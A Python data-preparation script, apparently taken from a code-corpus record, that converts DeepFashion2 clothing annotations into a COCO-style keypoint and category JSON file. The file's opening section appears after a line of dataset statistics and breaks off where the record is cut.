'225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 4,
'name': "long_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 5,
'name': "vest",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 6,
'name': "sling",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 7,
'name': "shorts",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 8,
'name': "trousers",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 9,
'name': "skirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 10,
'name': "short_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 11,
'name': "long_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 12,
'name': "vest_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 13,
'name': "sling_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
# categories2
dataset['categories2'].append({
'id': 1,
'name': "commodity",
'supercategory': "fashion",
})
dataset['categories2'].append({
'id': 2,
'name': "model",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 3,
'name': "detail",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 4,
'name': "specification",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 5,
'name': "unknown",
'supercategory': "fashion"
})
# dataset['categories2'].append({
# 'id': 0,
# 'name': "ignore",
# 'supercategory': "fashion"
# })
top_categories = (1, 2, 3, 4, 5, 6)
down_categories = (7, 8, 9)
whole_categories = (10, 11, 12, 13)
categories2_name = ['commodity', 'model', 'detail', 'specification', 'unknown']
part_name = ['ignore', 'top', 'down', 'whole']
total_landmark_nums = [25, 33, 31, 39, 15, 15, 10, 14, 8, 29, 37, 19, 19]
scale_types = ['unknown', 'small', 'modest', 'large']
# all bboxes are truncated, return true
start_id = 150001
num_images = 41960
root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
#root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
sub_index = 0 # the index of ground truth instance
sub_index2 = 0 # the index of annotations2 ground truth instance
for num in range(start_id, start_id + num_images):
json_name = root_dir + 'annos/' + str(num).zfill(6)+'.json'
image_name = root_dir + 'image/' + str(num).zfill(6)+'.jpg'
print("processing {}".format(image_name))
if (num>=0) and os.path.isfile(image_name):
imag = Image.open(image_name)
width, height = imag.size
items = []
with open(json_name, 'r') as f:
temp = json.loads(f.read())
source = temp['source']
# filter the user data first, only use the shop data in phase 1
if source != 'shop':
continue
pair_id = temp['pair_id']
dataset['images'].append({
'coco_url': '',
'date_captured': '',
'file_name': str(num).zfill(6) + '.jpg',
'flickr_url': '',
'id': num,
'license': 0,
'width': width,
'height': height
})
for i in temp:
if i == 'source' or i=='pair_id':
continue
else:
points = np.zeros(294 * 3)
sub_index = sub_index + 1
# bounding box
box = temp[i]['bounding_box']
w = box[2]-box[0]
h = box[3]-box[1]
x_1 = box[0]
y_1 = box[1]
bbox=[x_1,y_1,w,h]
# category
cat = temp[i]['category_id']
cat_name = temp[i]['category_name']
# other attribute
style = temp[i]['style']
viewpoint = temp[i]['viewpoint']
scale = temp[i]['scale']
zoom_in = temp[i]['zoom_in']
occlusion = temp[i]['occlusion']
#segmentation and landmarks
seg = temp[i]['segmentation']
landmarks = temp[i]['landmarks']
points_x = landmarks[0::3]
points_y = landmarks[1::3]
points_v = landmarks[2::3]
points_x = np.array(points_x)
points_y = np.array(points_y)
points_v = np.array(points_v)
if cat == 1:
for n in range(0, 25):
points[3 * n] = points_x[n]
points[3 * n + 1] = points_y[n]
points[3 * n + 2] = points_v[n]
elif cat ==2:
for n in range(25, 58):
points[3 * n] = points_x[n - 25]
points[3 * n + 1] = points_y[n - 25]
points[3 * n + 2] = points_v[n - 25]
elif cat ==3:
for n in range(58, 89):
points[3 * n] = points_x[n - 58]
points[3 * n + 1] = points_y[n - 58]
points[3 * n + 2] = points_v[n - 58]
elif cat == 4:
for n in range(89, 128):
points[3 * n] = points_x[n - 89]
points[3 * n + 1] = points_y[n - 89]
points[3 * n + 2] = points_v[n - 89]
elif cat == 5:
for n in range(128, 143):
points[3 * n] = points_x[n - 128]
points[3 * n + 1] = points_y[n - 128]
points[3 * n + 2] = points_v[n - 128]
elif cat == 6:
for n in range(143, 158):
points[3 * n] = points_x[n - 143]
points[3 * n + 1] = points_y[n - 143]
points[3 * n + 2] = points_v[n - 143]
elif cat == 7:
for n in range(158, 168):
points[3 * n] = points_x[n - 158]
points[3 * n + 1] = points_y[n - 158]
points[3 * n + 2] = points_v[n - 158]
elif cat == 8:
for n in range(168, 182):
points[3 * n] = points_x[n - 168]
points[3 * n + 1] = points_y[n - 168]
points[3 * n + 2] = points_v[n - 168]
elif cat == 9:
for n in range(182, 190):
points[3 * n] = points_x[n - 182]
points[3 * n + 1] = points_y[n - 182]
points[3 * n + 2] = points_v[n - 182]
elif cat == 10:
for n in range(190, 219):
points[3 * n] = points_x[n - 190]
points[3 * n + 1] = points_y[n - 190]
points[3 * n + 2] = points_v[n - 190]
elif cat == 11:
for n in range(219, 256):
points[3 * n] = points_x[n - 219]
points[3 * n + 1] = points_y[n - 219]
points[3 * n + 2] = points_v[n - 219]
elif cat == 12:
for n in range(256, 275):
points[3 * n] = points_x[n - 256]
points[3 * n + 1] = points_y[n - 256]
points[3 * n + 2] = points_v[n - 256]
elif cat == 13:
for n in range(275, 294):
points[3 * n] = points_x[n - 275]
points[3 * n + 1] = points_y[n - 275]
points[3 * n + 2] = points_v[n - 275]
num_points = len(np.where(points_v > 0)[0])
items.append(item(cat, viewpoint, scale, bbox, num_points))
dataset['annotations'].append({
'area': w*h,
'bbox': bbox,
'category_id': cat,
'id': sub_index,
'pair_id': pair_id,
'image_id': num,
'iscrowd': 0,
'style': style,
'num_keypoints':num_points,
'keypoints':points.tolist()
#'segmentation': seg,
})
# category2_id, part, toward = deepfashion2noah(items, (width, height))
# for test
# if category2_id == 2:
# new_path = image_name.replace('image', categories2_name[category2_id] + '/' + part_name[part])
# else:
# new_path = image_name.replace('image', categories2_name[category2_id])
#
# shutil.move(image_name, new_path)
part = 0
toward = 0
sub_index2 += 1
dataset['annotations2'].append({
'image_id': num,
'id': sub_index2,
'category2_id': random.randint(1, 5),
'part': part if part is not None else 0,
'toward': toward if toward is not None else 0,
'ignore': 1 # 1 means ignore the result
})
json_name = root_dir + 'classification_ignore_19w.json'
with open(json_name, 'w') as f:
json.dump(dataset, f)
| 90.548753 | 1,968 | 0.425548 | import json
from PIL import Image
import numpy as np
import shutil
import os
import random
dataset = {
"info": {},
"licenses": [],
"images": [],
"annotations": [],
"annotations2": [],
"categories": [],
"categories2": []
}
dataset['categories'].append({
'id': 1,
'name': "short_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 2,
'name': "long_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 3,
'name': "short_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', 